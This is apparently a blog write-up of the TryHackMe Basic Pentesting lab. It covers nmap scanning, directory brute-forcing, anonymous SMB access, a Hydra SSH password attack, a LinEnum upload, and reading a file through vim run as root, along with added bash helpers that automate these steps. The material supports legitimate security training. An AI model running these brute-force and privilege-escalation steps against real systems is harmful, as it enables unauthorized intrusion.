The skills tested and needed to solve this room are: web application enumeration, boot2root, and password cracking.
This room has been out for over a year, but it is still a great one to practice on. I was assigned an IP of 10.10.170.205
Shout-out to @ashu for creating this room. Visit https://tryhackme.com and create a free account to take advantage of this great learn-to-hack platform.
Answers are masked, so you will have to do the steps yourself and see how things work. I don’t want to take away this learning experience from you. The purpose of this write-up is to help you when you feel stuck and to show how other users like me cracked the room.
There are 11 questions to complete the room:
- Deploy the machine and connect to the network
- No answer needed
- Find the services exposed by the machine
- No answer needed
- What is the name of the hidden directory on the web server (enter without “/”)
- d*********t
- Use brute-forcing to find the username and password
- No answer needed
- What is the username?
- j**
- What is the password?
- a*****o
- What service do you use to access the server (answer in abbreviation in all caps)
- S**
- Enumerate the machine to find any vectors for privilege escalation
- No answer needed
- What is the name of the other user you found (all lower case)
- k**
- If you have found another user, what can you do with this information?
- No answer needed
- What is the final password you obtained?
- h******************************************************$
Steps:
1. Deploy the machine and connect to the network:

2. Find the services exposed by the machine by using nmap. sudo nmap -sC -sV -oA basic_pentesting 10.10.170.205
- sudo – running nmap as root lets it use its default SYN (-sS) scan and raw-socket probes; without root it falls back to a slower TCP connect scan. (OS fingerprinting with -O or -A also requires root, but these flags do not request it.)
- -sC – run the default nmap scripts against the open ports
- -sV – probe the open ports for service and version information
- -oA basic_pentesting – save the results under the base name “basic_pentesting” in three formats (normal .nmap, XML .xml, and grepable .gnmap)

- The nmap output shows that the website has no title, but it is still good practice to browse to it anyway:

- Let’s check the page source to see if we can find any clues:
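
The -oA flag above also writes a grepable file (basic_pentesting.gnmap). As an added example, not part of the original write-up, here is a small bash function that pulls the open ports out of that format so later steps (SMB, SSH, gobuster) can be driven from the saved scan instead of the screen output. The sample .gnmap text is constructed and its ports and service names are illustrative only, not the room’s real scan result.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): extract open ports from nmap's
# grepable output, the .gnmap file produced by -oA.
set -eu

# Constructed sample of a .gnmap file (illustrative ports/services, not the real scan).
# The "Ports:" field is tab-separated from the rest of the line, so build it with printf.
SAMPLE_GNMAP=$(printf '# Nmap 7.x scan initiated (constructed sample)\nHost: 10.10.170.205 ()\tStatus: Up\nHost: 10.10.170.205 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 8009/closed/tcp//ajp13///\tIgnored State: closed (995)\n# Nmap done (constructed sample)\n')

# open_ports <gnmap text>: print "port/proto service" for every port whose state is "open".
# Each entry inside "Ports:" is "port/state/proto/owner/service/rpcinfo/version/" and
# entries are separated by ", ".
open_ports() {
  printf '%s\n' "$1" | awk '
    BEGIN { FS = "\t" }
    /^Host: / {
      for (i = 1; i <= NF; i++) {
        if ($i ~ /^Ports: /) {
          sub(/^Ports: /, "", $i)
          n = split($i, entries, ", ")
          for (j = 1; j <= n; j++) {
            split(entries[j], f, "/")
            if (f[2] == "open") print f[1] "/" f[3] " " f[5]
          }
        }
      }
    }' | sort -n
}

# Real use after the scan from the text (network step, not run here):
#   sudo nmap -sC -sV -oA basic_pentesting 10.10.170.205
#   open_ports "$(cat basic_pentesting.gnmap)"
open_ports "$SAMPLE_GNMAP"
```

The function only reports ports in state open, so the closed entry in the sample is dropped; filtered ports would be dropped the same way, which is what you want when deciding what to enumerate next.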

3. What is the name of the hidden directory on the web server?
- We will use gobuster to look for hidden directories, and hopefully find the “dev” section that the page-source comment mentioned. gobuster dir -u http://10.10.170.205 -w /usr/share/wordlists/dirb/common.txt
- dir – use directory/file brute-forcing mode
- -u – the target URL to scan
- -w – the wordlist of directory and file names to try

- Let’s check the contents of the hidden directory

- Check what’s inside the dev.txt

- Check what’s inside the j.txt

- We need to enumerate the victim machine further, because we still have no clue about the naming convention used for usernames. Let’s enumerate the SMB service. Looking at the nmap result again, the script output shows that SMB can be accessed as guest:

- Try to connect to the SMB share with anonymous access. smbclient prompts for a password for the SMB session; for an anonymous share just press Enter to send an empty password (or add -N to skip the prompt). smbclient //10.10.170.205/anonymous

- Download the file to your attack machine (Kali) using get so we can open it locally. get staff.txt

- Exit smbclient, go back to your Kali terminal and open the file with cat. cat staff.txt
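
The reason for pulling staff.txt is the naming convention: once you know how the staff are named, you can guess the login names. As an added example, not part of the original write-up, the bash functions below turn full names into the usual login-name patterns (first name, first initial plus surname, first.last, and so on) and deduplicate them, so the SSH brute force can take a short username list via hydra -L instead of one guessed name. The sample staff names are constructed, not the ones from the room; the file name users.txt in the usage comment is an assumption.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): derive login-name candidates from
# full names such as those in a staff list.
set -eu

# Constructed sample in the spirit of staff.txt; not the names from the room.
SAMPLE_STAFF='Alice Example
Bob Sample'

# username_candidates "First [Middle] Last": print common login-name patterns in
# lowercase, one per line, without duplicates. Middle names are ignored; a single-word
# name yields just that word.
username_candidates() {
  local first last fi li
  first=$(printf '%s' "$1" | awk '{print tolower($1)}')
  last=$(printf '%s' "$1" | awk '{print tolower($NF)}')
  if [ "$first" = "$last" ]; then
    printf '%s\n' "$first"
    return 0
  fi
  fi=$(printf '%s' "$first" | cut -c1)   # first initial
  li=$(printf '%s' "$last" | cut -c1)    # last initial
  printf '%s\n' "$first" "$last" "$fi$last" "$first.$last" "$first$li" "$fi.$last" "$first$last" \
    | awk '!seen[$0]++'
}

# candidates_from_list <staff text>: apply username_candidates to every non-empty line
# and deduplicate across the whole list.
candidates_from_list() {
  printf '%s\n' "$1" | while IFS= read -r name; do
    [ -n "$name" ] && username_candidates "$name"
  done | awk '!seen[$0]++'
}

# Real use (network step, not run here): save the list and hand it to hydra with -L
#   candidates_from_list "$(cat staff.txt)" > users.txt
#   hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.10.170.205 ssh -t 4
candidates_from_list "$SAMPLE_STAFF"
```

Keep the username list short: every extra username multiplies the number of SSH attempts, and hydra is already throttled to four parallel connections against SSH, so a handful of well-chosen patterns beats a generic list.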

4. Use brute-forcing to find the username and password
- Remember the contents of the j.txt we found in the hidden directory? User k** was telling user j** that the password in use is weak. So it makes more sense to brute-force user j**’s credentials than user k**’s. We are going to use the tool Hydra. hydra -l j** -P /usr/share/wordlists/rockyou.txt 10.10.170.205 ssh -t 4
- -l – use a single username
- -P – uppercase “P”: use a list of passwords to try against that username
- ssh – the service we are trying to crack. Since SSH is one of the open services from our nmap scan, it makes sense to attack it
- -t 4 – the number of parallel connections. The default is 16, but Hydra recommends no more than 4 for SSH, since many SSH servers limit concurrent unauthenticated connections

5. What is the username?

6. What is the password?

7. What service do you use to access the server?

8. Enumerate the machine to find any vectors for privilege escalation
- We can check whether user j** has any sudo privileges. sudo -l

- We can tell that the server we are on is running Linux, so let’s download LinEnum and use it to enumerate the victim machine for any holes we can use to escalate our privileges. On your Kali machine: wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

- We need to transfer the downloaded script to the victim machine. Since we already have a username and password for SSH access, we can use scp, which copies files over SSH. scp LinEnum.sh j**@10.10.170.205:/home/j**
- LinEnum.sh – the file we want to transfer
- j**@10.10.170.205 – the username to authenticate with on the victim machine, 10.10.170.205
- :/home/j** – the location on the victim where we want the file to land

- The copy failed because user j** cannot write to that location, so we have to find a directory where j** does have write permission. Let’s do a long listing of the directories at the root level

- Let’s try and copy LinEnum.sh from our attack machine to the victim machine, and specifically to the /tmp directory

- Confirm that the file is on the victim machine

- Let’s run the script to enumerate ways to escalate our privilege to root


- The script is not executable yet; fix that with chmod. chmod +x LinEnum.sh

- Let’s run LinEnum.sh again. ./LinEnum.sh. There was a lot of information, but this is what caught my attention
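
The upload above took three tries (a failed scp into the home directory, a second copy into /tmp, then chmod +x). As an added example, not part of the original write-up, here is a bash helper that first asks the victim over SSH which candidate directory the user can actually write to, then copies the script there, makes it executable and runs it in one go. The candidate directory list ($HOME, /tmp, /dev/shm, /var/tmp) and the -t (thorough) flag passed to LinEnum are my choices, not the page’s.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): copy an enumeration script to a
# directory the low-privileged SSH user can write to, then run it.
set -eu

# first_writable_dir DIR...: print the first argument that exists and is writable and
# searchable by the current user; return 1 if none qualifies.
first_writable_dir() {
  local d
  for d in "$@"; do
    if [ -d "$d" ] && [ -w "$d" ] && [ -x "$d" ]; then
      printf '%s\n' "$d"
      return 0
    fi
  done
  return 1
}

# upload_and_run USER HOST LOCALFILE [SCRIPT ARGS...]: network step, not run in tests.
# The remote probe repeats the first_writable_dir test inline because the function is
# not defined on the victim; $HOME there resolves to the SSH user's home directory.
upload_and_run() {
  local user=$1 host=$2 file=$3 dir name
  shift 3
  name=$(basename "$file")
  dir=$(ssh "$user@$host" 'for d in "$HOME" /tmp /dev/shm /var/tmp; do
          [ -d "$d" ] && [ -w "$d" ] && [ -x "$d" ] && { printf "%s\n" "$d"; exit 0; }
        done; exit 1') || { echo "no writable directory found on $host" >&2; return 1; }
  scp "$file" "$user@$host:$dir/$name"
  ssh "$user@$host" "chmod +x '$dir/$name' && '$dir/$name' $*"
}

# Example use with the walkthrough's credentials (not run here):
#   upload_and_run j** 10.10.170.205 ./LinEnum.sh -t

# Local demonstration of the directory check on a constructed temporary directory.
demo=$(mktemp -d)
first_writable_dir /nonexistent/dir "$demo"
rmdir "$demo"
```

If you cannot use scp at all (no SSH login, only a shell), the same check still tells you where to drop a file fetched with wget or curl from a web server on your attack machine.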

9. What is the name of the other user you found?
- Both in /etc/passwd and by listing /home, we can see user k**

10. If you have found another user, what can you do with this information?
- The other user we found is k**, but the more important finding is that the enumeration output showed a way to run vim as root, and we can use that to read files in user k**’s home directory.
11. What is the final password you obtained?
- Since enumeration showed that we can run vim as root, we can use vim to open the file pass.bak inside user k**’s home directory. /usr/bin/vim.basic /home/kay/pass.bak

- We have successfully read the pass.bak file and found the answer to question 11

Hope you learned and enjoyed the write-up.

Please don’t forget to subscribe to my page N00b_H@ck3r, click the link and enter your email address.
